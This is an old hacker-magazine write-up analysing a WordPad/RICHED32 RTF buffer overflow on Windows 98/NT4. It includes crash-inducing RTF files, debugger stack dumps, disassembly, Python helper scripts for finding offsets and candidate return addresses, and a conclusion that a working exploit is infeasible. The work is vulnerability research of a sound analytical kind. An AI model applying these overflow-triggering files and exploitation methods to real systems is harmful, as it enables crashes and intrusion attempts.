


        I. Introduction

 The first report was from Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>

        Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
        overflow problem with ".rtf"-files.

        Crashme.rtf :
        {\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}

        A malicious document may probably abuse this to execute arbitrary
        code. WordPad crashes with EIP=41414141.

 Thomas Dullien <dullien@GMX.DE> did very good research on this buffer
 overflow. Unfortunately, I received his vuln-dev post when I was already
 deep into the Wordpad code, so I had already discovered most of the details
 that he posted.

        II. Research

     Ok, let's try to exploit this shit. First, try to crash Wordpad.
 Create the following file:

 {\rtf\AAAAAAAAAA(100 'A's)}

 I am using SoftICE to inspect the situation after the crash.
 First, take a look at the registers and the stack.

 EIP=61616161
 ESP=0012F044
 EBP=61616161
                                  ebp      eip
 0023:0012F024 0012F104 00000102 61616161 61616161   ........aaaaaaaa
 0023:0012F034 0000001B 00000246 0012F044 00000023   ....F...D...#...
 0023:0012F044 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F054 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F064 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F074 61616161 61616161 00000000 00000000   aaaaaaaa........

 We can assume that EBP and EIP were popped from the stack and then RET 10
 was executed, which pops the return address and then adds another 10h to
 the stack pointer.

 To check if this is the case, try the following:

 {\rtf\AAAABBBBCCCCDDDDEEEEFFFF(...to ZZZZ)}

 Wordpad crashes again. The registers and the stack are as follows:

 ESP=0012F054
 EBP=6A6A6A6A 'jjjj'
 EIP=6B6B6B6B 'kkkk'

                                   ebp      eip
 0023:0012F034 0012F114 00000102 6a6a6a6a 6b6b6b6b   ........jjjjkkkk
 0023:0012F044 0000001B 00000246 0012F054 00000023   ....F...D...#...
 0023:0012F054 6C6C6C6C 6D6D6D6D 6E6E6E6E 6F6F6F6F   llllmmmmnnnnoooo
 0023:0012F064 70707070 71717171 72727272 73737373   ppppqqqqrrrrssss
 0023:0012F074 74747474 75757575 76767676 77777777   ttttuuuuvvvvwwww
 0023:0012F084 78787878 79797979 7A7A7A7A 00000200   xxxxyyyyzzzz....

 Yes, our assumption was correct. EBP gets its value from 0012F03C, and the
 RET 10 instruction gets the EIP from 0012F040.
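
 The stack pointer arithmetic can be checked against both dumps. This is
 only a sketch: the helper name esp_after_ret is mine, and the slot
 addresses are read off the dumps above (the dword marked "eip" in each).

```python
def esp_after_ret(ret_slot, imm):
    """ESP after 'RET imm': pop the 4-byte return address, then add imm."""
    return ret_slot + 4 + imm

# (address of the return-address slot, ESP reported after the crash)
observations = (
    (0x0012F030, 0x0012F044),   # first crash, 100 'A's
    (0x0012F040, 0x0012F054),   # second crash, AAAABBBB... pattern
)

for slot, observed_esp in observations:
    predicted = esp_after_ret(slot, 0x10)
    print(hex(slot), hex(predicted), predicted == observed_esp)
```

 Both predictions match the reported ESP, which is what we would expect if
 the 10 in RET 10 is hexadecimal, as SoftICE displays it.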

 The buffer is probably 36 characters big, because 'jjjj' (characters 37 to
 40 of our string) is what ends up in EBP. By the way, notice that the
 characters are lowercase. This means that the string is lowercased before
 the crash.
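
 Finding the offsets by eye gets boring quickly, so here is a small sketch
 that builds the test string and looks up a crashed register value in it.
 The function names are my own, and the lookup assumes the lowercasing
 observed above.

```python
import string

def make_pattern(groups=26, width=4):
    """Build AAAABBBBCCCC...ZZZZ (each letter repeated 'width' times)."""
    return "".join(ch * width for ch in string.ascii_uppercase[:groups])

def offset_of(register_value, pattern):
    """Offset in the pattern of the 4 bytes that ended up in a register."""
    # x86 is little-endian, so convert the dword back to memory order.
    seen = register_value.to_bytes(4, "little").decode("ascii")
    # The string is lowercased before the crash, so compare in lowercase.
    return pattern.lower().find(seen)

pattern = make_pattern()
print("{\\rtf\\" + pattern + "}")        # contents of the test .rtf file
print(offset_of(0x6A6A6A6A, pattern))    # EBP -> 36
print(offset_of(0x6B6B6B6B, pattern))    # EIP -> 40
```

 The saved EBP sits 36 bytes into the string and the return address 40 bytes
 in, which agrees with the guess of a 36 byte buffer.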

 Let's try the following file (36 characters):

 {\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII}

 It shouldn't crash, but it does. This is strange. Take a look at the
 registers and the stack: (btw, do a quick check with 35 characters - Wordpad
 will not crash)

 EIP=002E0033
 ESP=0012F108
 EBP=00200067

 0023:0012F0E8 0012F294 6E002F02 00200067 002E0033   ...../.ng. .3...
 0023:0012F0F8 0000001B 00000202 0012F108 00000023   ............#...
 0023:0012F108 0020002E 006C0070 00610065 00650073   .. .p.l.e.a.s.e.
 0023:0012F118 00770020 00690061 00000074 00000000    .w.a.i.t.......
 0023:0012F128 00000000 00000000 0000002E 00000000   ................
 0023:0012F138 0012F194 5F816876 00000014 00000000   ....vh._........
 0023:0012F148 00000000 00000001 029AE0CD 00000064   ............d...
 0023:0012F158 0012F1B8 0012F68C 0012F638 5F816850   ........8...Ph._
 0023:0012F168 00C14812 00000000 0012F2A4 00000168   .H..........h...
 0023:0012F178 0012F292 0012F290 00C15810 0012F1A8   .........X......
 0023:0012F188 00C15B3A 00000007 00000006 0012F1CC   :[..............
 0023:0012F198 6C026878 0012F294 0012F290 00C11DC8   xh.l............
 0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
 0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
 0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290   iii}.....k.l....

 This is even more strange. The EBP and EIP are not overwritten by our
 string, but they are still smashed.

 It's time to find exactly where the code responsible for this mess is.
 Notice that EIP is overwritten, so we don't know what code was executed
 before the crash. Pauli Ojanpera posted that the crash was in riched20.dll.
 Check the loaded DLLs: there is no riched20.dll, but we see riched32.dll.
 This sounds good! At what address is this DLL loaded?

 :map32 riched32
 Owner       Obj Name  Obj#  Address        Size      Type
 RICHED32   .text      0001  001B:6C001000  00027284  CODE  RO

 The code is loaded at 6C001000. Where is the buffer overflow? It is probably
 located in some function in RICHED32.DLL. This function is probably called
 from some other function, which is also called from somewhere. We should
 be able to see the return addresses for these previous calls on the stack.
 Let's search for something that looks like a return address. At 0012F1D0 we
 see the bytes 6C026B81. This looks like an address in RICHED32.DLL, doesn't
 it? Go disassemble the bastard!

 It is part of a function starting at 6C026B0B and ending at 6C026B68.
 (I have included some more code in the middle, more about it later.)

 001B:6C026B0B push ebp
 001B:6C026B0C mov ebp, esp
 001B:6C026B0E sub esp, 04
 ...
 001B:6C026B7A mov ecx, esi
 001B:6C026B7C call 6C0267D1             ; this is called for each \ tag
 001B:6C026B81 mov [edi], eax
 ...
 001B:6C026B64 pop edi
 001B:6C026B65 pop esi
 001B:6C026B66 mov esp, ebp
 001B:6C026B68 ret

 Put a breakpoint in the beginning of this function and see what happens.
 The 6C026B0B function is called 2 times and crashes the second time.
 Trace it step by step, stepping over the calls. The function crashes
 after the final RET instruction (located at 6C026B68)

 Just before the crash the stack looks like this:

                  edi      esi  local_var  old_ebp
 0023:0012F1D4 0012F290 00C13D58 5CC15A30 0012F40C
 0023:0012F1E4 6C024DE0  <- ret address

 The POP EDI and POP ESI instructions restore these two registers (look at
 the disassembly). Then the function restores the ESP (which is saved in EBP
 in the beginning of the function). By trying this with a normal RTF file
 (not causing a buffer overflow), we see that ESP becomes 0012F1E0. Then EBP
 is popped from the stack (it becomes 0012F40C) and the RET instruction
 returns the execution flow to 6C024DE0.

 This is not the case with a fucked up RTF file. Everything is ok until we
 hit the MOV ESP, EBP instruction. The value in the EBP register is not
 correct, thus fucking up the ESP and causing a mess.
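
 The epilogue is easy to model. The sketch below replays MOV ESP, EBP / POP
 EBP / RET on the two stack values shown above, once with the good EBP
 (0012F1E0) and once with the smashed value 0012F100 that the tracing further
 down turns up. The function name is mine, and stack slots we have no dump
 for come back as None.

```python
def run_epilogue(stack, ebp):
    """Model 'mov esp, ebp / pop ebp / ret' on a dict of address -> dword."""
    esp = ebp                     # mov esp, ebp
    new_ebp = stack.get(esp)      # pop ebp
    esp += 4
    ret_addr = stack.get(esp)     # ret
    esp += 4
    return new_ebp, ret_addr, esp

# old_ebp and the return address, as shown just before the crash
stack = {0x0012F1E0: 0x0012F40C, 0x0012F1E4: 0x6C024DE0}

good = run_epilogue(stack, 0x0012F1E0)
bad = run_epilogue(stack, 0x0012F100)

print([hex(v) for v in good])     # EBP=0012F40C, EIP=6C024DE0, ESP=0012F1E8
print(hex(bad[2]))                # ESP=0012F108, as in the crash dump
```

 With the smashed EBP the function pops its "saved EBP" and "return address"
 from 0012F100 and 0012F104, and ESP ends up at 0012F108, exactly the value
 we saw after the 36 character crash.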

 Ok, now we need to find where in the 6C026B0B function the EBP is smashed.
 Put a breakpoint in the beginning of the function and trace it (without
 stepping into the calls). The EBP in the beginning of the function is
 0012F1E0. It changes after the CALL 6C0267D1 instruction.

 Now we have the function that changes the EBP.

 001B:6C0267D1 push ebp
 001B:6C0267D2 mov ebp, esp
 001B:6C0267D4 sub esp, 24
 ...

 The stack of this function looks like this:

 0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
 0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
 0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290   iii}.....k.l....
                          ebp      eip

 At 0012F1D0 we have the return address. The EBP is saved at 0012F1CC and
 then the stack pointer is decremented by 24h (36 decimal), leaving space
 for 36 bytes of local variables. Remember this number? This is our buffer!

 After some more tracing, we see that the saved EBP is changed by
 001B:6C0268E9 mov byte ptr [ebx], 00
 executed right after the buffer is filled with our characters. This
 is the NULL termination of the string. With 36 characters it lands on the
 low byte of the saved EBP, changing it from 0012F1E0 to 0012F100.
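
 Here is the off-by-one in numbers. A minimal sketch, assuming the buffer
 starts at 0012F1A8 and the saved EBP (value 0012F1E0, the EBP of the calling
 function) sits in the dword at 0012F1CC, as read off the stack dump. The
 names are mine.

```python
BUF_START = 0x0012F1A8        # first byte of the buffer
SAVED_EBP_SLOT = 0x0012F1CC   # dword holding the caller's EBP
SAVED_EBP = 0x0012F1E0        # EBP at the beginning of the 6C026B0B function

def saved_ebp_after_terminator(name_len):
    """Saved EBP after a 00 byte is written at BUF_START + name_len."""
    slot = bytearray(SAVED_EBP.to_bytes(4, "little"))
    index = BUF_START + name_len - SAVED_EBP_SLOT
    if 0 <= index < 4:            # the terminator falls inside the slot
        slot[index] = 0
    return int.from_bytes(slot, "little")

print(hex(saved_ebp_after_terminator(35)))   # 0x12f1e0, untouched
print(hex(saved_ebp_after_terminator(36)))   # 0x12f100, low byte zeroed
```

 This is why 35 characters are harmless and 36 are not: the terminator is
 the only byte that reaches the saved EBP, and it hits the low byte because
 x86 stores dwords little-endian.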

 Let's do some more reverse engineering. From 6C0268AE to 6C0268DB we have
 a loop that reads our string and copies it into the buffer.

 001B:6C0268AE mov al, [ecx]             ; get the current char
 001B:6C0268B0 inc ecx                   ; ecx points to the next char
 001B:6C0268B1 mov [ebp-01], al          ; store the current char at 0012F1CB
 001B:6C0268B4 mov [esi+1C], ecx         ; store ecx at 0012F2AC
 001B:6C0268B7 mov eax, 00000001         ; what the fuck?
 001B:6C0268BC test eax, eax
 001B:6C0268BE jc 6C0268E9               ; this is never executed
 001B:6C0268C0 movzx eax, byte ptr [ebp-01]      ; get the current char
 001B:6C0268C4 test byte ptr [eax+6C00C6B8], 01  ; is it 'A'-'Z' or 'a'-'z' ?
 001B:6C0268CB jz 6C0268E9                       ; no -> go there
 001B:6C0268CD mov al, [ebp-01]          ; get the current char
 001B:6C0268D0 or al, 20                 ; make it lowercase
 001B:6C0268D2 mov [ebx], al             ; store it in the buffer
 001B:6C0268D4 inc ebx
 001B:6C0268D5 mov ecx, [esi+1c]         ; restore ecx
 001B:6C0268D8 cmp [esi+18], ecx         ; reached the end of the string?
 001B:6C0268DB jnz 6C0268AE              ; no -> loop again

 ECX is a pointer to the memory location where the RTF file is loaded. It
 points to the character that we are currently copying. EBX points to the
 buffer. The buffer starts at 0012F1A8.

 By the way, notice that the current character is stored at 0012F1CB, the
 last byte of the dword at 0012F1C8 (the third line in the disassembly).
 This suggests that our buffer is really only 32 bytes long, with another
 local variable after it. This doesn't really matter, because the copying
 works even if we overwrite this variable (it is rewritten on every
 iteration). If we put some shellcode there, we need to know that this
 particular byte will be changed to the first character after the end of
 the string. In our case, this is '}'.

 Notice the "test byte ptr [eax+6C00C6B8], 01" instruction. At this
 memory location (6C00C6B8) we have an array of bytes, corresponding to each
 ASCII value.

 The array at 6C00C6B8
 +00      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +10      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +20      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +30      06 06 06 06 06 06 06 06-06 06 00 00 00 00 00 00
 +40      00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
 +50      01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
 +60      00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
 +70      01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
 +80      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +90      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +A0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +B0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +C0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +D0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +E0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 +F0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00

 The only ASCII characters that will pass the JZ condition after the TEST
 instruction are the letters 'A'-'Z' and 'a'-'z' (ASCII values 41-5A and
 61-7A). If any other character is reached, the copying is ended and the
 buffer is NULL terminated.
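
 To make the loop and the table easier to follow, here is a rough model of
 both. It is a sketch of my reading of the disassembly, not the real code:
 the table is rebuilt from the dump above, copy_keyword is a name I made up,
 and the model returns the bytes that get written instead of touching a real
 stack.

```python
def build_class_table():
    """Rebuild the 256-byte table dumped at 6C00C6B8."""
    table = [0] * 256
    for c in range(0x30, 0x3A):            # '0'-'9'
        table[c] = 0x06
    for base in (0x41, 0x61):              # 'A' and 'a'
        for c in range(base, base + 26):
            # the hex-digit letters A-F / a-f carry an extra flag (05)
            table[c] = 0x05 if c < base + 6 else 0x01
    return table

CLASS = build_class_table()
LOCALS = 36                                # bytes reserved by SUB ESP, 24

def copy_keyword(src):
    """Bytes the loop writes for src, including the final NULL."""
    out = bytearray()
    for ch in src:
        if not (CLASS[ch] & 0x01):         # TEST ..., 01 / JZ: not a letter
            break
        out.append(ch | 0x20)              # OR AL, 20: make it lowercase
    out.append(0)                          # MOV BYTE PTR [EBX], 00
    return bytes(out)                      # note: no length check anywhere

written = copy_keyword(b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII}")
print(written)
print(len(written), len(written) > LOCALS)   # 37 True
```

 Digits have the value 06 in the table, so bit 0 is clear and they end the
 copy just like '}' or '\' would. Nothing in the loop compares the number of
 copied bytes to the size of the locals, which is the whole bug.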

 Next we try really taking over the return address.

 {\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKAAAAAAAAAAAAAAAA(more As)}

 'jjjj' overwrites the saved EBP and the return address becomes 'kkkk'. After
 the overwritten return address, we have more As.

 0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
 0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
 0023:0012F1C8 7D696969 6A6A6A6A 6B6B6B6B 61616161   iii}jjjjkkkkaaaa
 0023:0012F1D8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F1E8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F1F8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F208 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F218 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F228 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F238 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F248 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F258 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F268 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F278 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
 0023:0012F288 61616161 61616161 00000000 00000000   aaaaaaaa........
 0023:0012F298 00000000 00000000 00000000 00000000   ................
 0023:0012F2A8 00000000 000C1814 00000000 00000000   ................

 At 0012F2AC we have a pointer to the current character in the file buffer.
 ECX is saved to this location (referenced as esi+1C) before the copying, and
 restored afterwards. This value is updated after every copied byte. If we
 overwrite it, it will start pointing to a new memory location. The copy loop
 will try to read the bytes to copy from there and probably crash. Even if we
 somehow manage to overwrite this with a valid memory pointer, this will be
 the last byte copied from our string.

 This limits us to 216 'A's after the 'jjjjkkkk'.
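
 The number comes straight from the addresses in the dump. A quick check,
 assuming the buffer starts at 0012F1A8 and the pointer we must not touch
 lives at 0012F2AC (the constant names are mine):

```python
BUF_START = 0x0012F1A8       # first byte of the buffer
SRC_PTR_SLOT = 0x0012F2AC    # [esi+1C], the pointer into the file buffer

LOCALS = 36                  # 'aaaa'..'iiii'
SAVED_EBP = 4                # 'jjjj'
RET_ADDR = 4                 # 'kkkk'

payload_start = BUF_START + LOCALS + SAVED_EBP + RET_ADDR
room = SRC_PTR_SLOT - payload_start

print(hex(payload_start))    # 0x12f1d4
print(room)                  # 216
```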


        III. Is an exploit possible?

 Exploiting this buffer overflow will be hard. Maybe not impossible, but
 very hard. We have only 216 bytes to squeeze our shellcode into, and we can
 use only 26 characters - the letters from 'a' to 'z'.

 Writing shellcode with no nulls is hard; writing it with nothing but
 letters is almost impossible.

 First, we need some way of pointing the return address to something useful.
 We cannot point it to the stack, because the stack address contains
 'prohibited' characters. After the RET instruction the ESP points to the
 second part of our string (the one after 'jjjjkkkk'). We need a JMP ESP or
 CALL ESP instruction. The usual approach is to look at the DLLs loaded at
 the time of the crash and to find one of these instructions at some memory
 location. Then we can point the return address to this memory location and
 have it jump back to our shellcode. The problem is that we need the address
 of this memory location to consist only of lowercase letters.

 c:\>listdlls.exe wordpad

 ListDLLs V2.1
 Copyright (C) 1997-1999 Mark Russinovich
 http://www.sysinternals.com

 ------------------------------------------------------------------------------
 WORDPAD.EXE pid: 275
   Base        Size      Version         Path
   0x029a0000  0x34000   4.00.1381.0096  C:\Program Files\Windows NT\Accessories\wordpad.exe
   0x77f60000  0x5e000   4.00.1381.0174  C:\WINNT\System32\ntdll.dll
   0x5f800000  0xee000   4.21.0000.7160  C:\WINNT\System32\MFC42u.DLL
   0x78000000  0x40000   6.00.8397.0000  C:\WINNT\system32\MSVCRT.dll
   0x77f00000  0x5e000   4.00.1381.0178  C:\WINNT\system32\KERNEL32.dll
   0x77ed0000  0x2c000   4.00.1381.0115  C:\WINNT\system32\GDI32.dll
   0x77e70000  0x54000   4.00.1381.0133  C:\WINNT\system32\USER32.dll
   0x77dc0000  0x3f000   4.00.1381.0203  C:\WINNT\system32\ADVAPI32.dll
   0x77e10000  0x57000   4.00.1381.0193  C:\WINNT\system32\RPCRT4.dll
   0x77d80000  0x32000   4.00.1381.0133  C:\WINNT\system32\comdlg32.dll
   0x70970000  0x1a8000  4.72.3110.0006  C:\WINNT\system32\SHELL32.dll
   0x70bd0000  0x44000   5.00.2314.1000  C:\WINNT\system32\SHLWAPI.dll
   0x71590000  0x87000   5.80.2314.1000  C:\WINNT\system32\COMCTL32.dll
   0x77b20000  0xb6000   4.00.1381.0190  C:\WINNT\system32\ole32.dll
   0x76aa0000  0x6000    4.00.1371.0001  C:\WINNT\System32\INDICDLL.dll
   0x77c00000  0x18000   4.00.1381.0027  C:\WINNT\System32\WINSPOOL.DRV
   0x775a0000  0x14000   0.02.0000.0000  C:\WINNT\System32\spool\DRIVERS\W32X86\2\RASDDUI.DLL
   0x6c000000  0x2e000   4.00.0993.0004  C:\WINNT\System32\RICHED32.dll
   0x70400000  0x77000   5.00.2314.1000  C:\WINNT\System32\mlang.dll

 These are the loaded DLLs that we can use. The perfect DLL would be the same
 on Windows 95, 98, SE, NT 4 with all service packs and on Win2K.
 Unfortunately, such a DLL is just a dream. Our choices are really limited.
 Looking at the base addresses, we can eliminate most of the DLLs, because
 their addresses do not consist of lowercase letters. This leaves us with
 only one DLL that we can use:

  0x71590000  0x87000   5.80.2314.1000  C:\WINNT\system32\COMCTL32.dll

 We can only use the code in the range from 71616161 to 7161707A.
 After disassembling the DLL and looking at the code, we clearly see that
 there is no JMP ESP or CALL ESP instruction.
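
 The elimination can be repeated mechanically. The sketch below takes the
 base addresses and sizes from the ListDLLs output and reports every module
 that contains at least one address made only of the bytes 61-7A. The
 function name is mine, and it assumes that the ListDLLs size is the real
 extent of the mapped image.

```python
def letter_only_addresses(base, size):
    """(first, last, count) of all-lowercase addresses in a module, or None."""
    end = base + size
    hits = []
    # Walk the module in 256-byte steps; 'page' is the upper three bytes.
    for page in range(base >> 8, ((end - 1) >> 8) + 1):
        if not all(0x61 <= b <= 0x7A for b in page.to_bytes(3, "big")):
            continue
        for low in range(0x61, 0x7B):
            addr = (page << 8) | low
            if base <= addr < end:
                hits.append(addr)
    return (hits[0], hits[-1], len(hits)) if hits else None

# (name, base, size) copied from the ListDLLs output above
MODULES = [
    ("wordpad.exe", 0x029A0000, 0x34000), ("ntdll.dll", 0x77F60000, 0x5E000),
    ("MFC42u.DLL", 0x5F800000, 0xEE000), ("MSVCRT.dll", 0x78000000, 0x40000),
    ("KERNEL32.dll", 0x77F00000, 0x5E000), ("GDI32.dll", 0x77ED0000, 0x2C000),
    ("USER32.dll", 0x77E70000, 0x54000), ("ADVAPI32.dll", 0x77DC0000, 0x3F000),
    ("RPCRT4.dll", 0x77E10000, 0x57000), ("comdlg32.dll", 0x77D80000, 0x32000),
    ("SHELL32.dll", 0x70970000, 0x1A8000), ("SHLWAPI.dll", 0x70BD0000, 0x44000),
    ("COMCTL32.dll", 0x71590000, 0x87000), ("ole32.dll", 0x77B20000, 0xB6000),
    ("INDICDLL.dll", 0x76AA0000, 0x6000), ("WINSPOOL.DRV", 0x77C00000, 0x18000),
    ("RASDDUI.DLL", 0x775A0000, 0x14000), ("RICHED32.dll", 0x6C000000, 0x2E000),
    ("mlang.dll", 0x70400000, 0x77000),
]

for name, base, size in MODULES:
    found = letter_only_addresses(base, size)
    if found:
        first, last, count = found
        print(name, hex(first), hex(last), count)
```

 Only COMCTL32.dll is printed. By this arithmetic the image ends at 71617000,
 so the last candidate the sketch reports is 71616F7A, slightly below the
 upper bound quoted above, and there are 390 candidate addresses in total.
 mlang.dll has uppercase bytes (40-47) in its addresses, but those do not
 survive the lowercasing.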

 There is no way to execute the shellcode.

 Even if we could do it, making the shellcode do something useful would be
 a pain in the ass. The restrictions are too harsh.

 After the RET instruction, at ESP-50 we have a pointer to the beginning of
 the buffer, where the raw file is loaded. This buffer holds the raw file
 contents, so we can use NULLs and non-letter characters. Unfortunately, this
 buffer is in the heap and we can not execute any code from there. We need to
 copy the code to the stack first.

 The whole situation sucks. At least the Micro$oft users are saved once
 again! But not for long :-)
 
                                                                Solar Eclipse
                                                   (C) 2000 Phreedom Magazine
                                       www.phreedom.org | phreedom.orbitel.bg
                                    staff@phreedom.org :: mboard.phreedom.org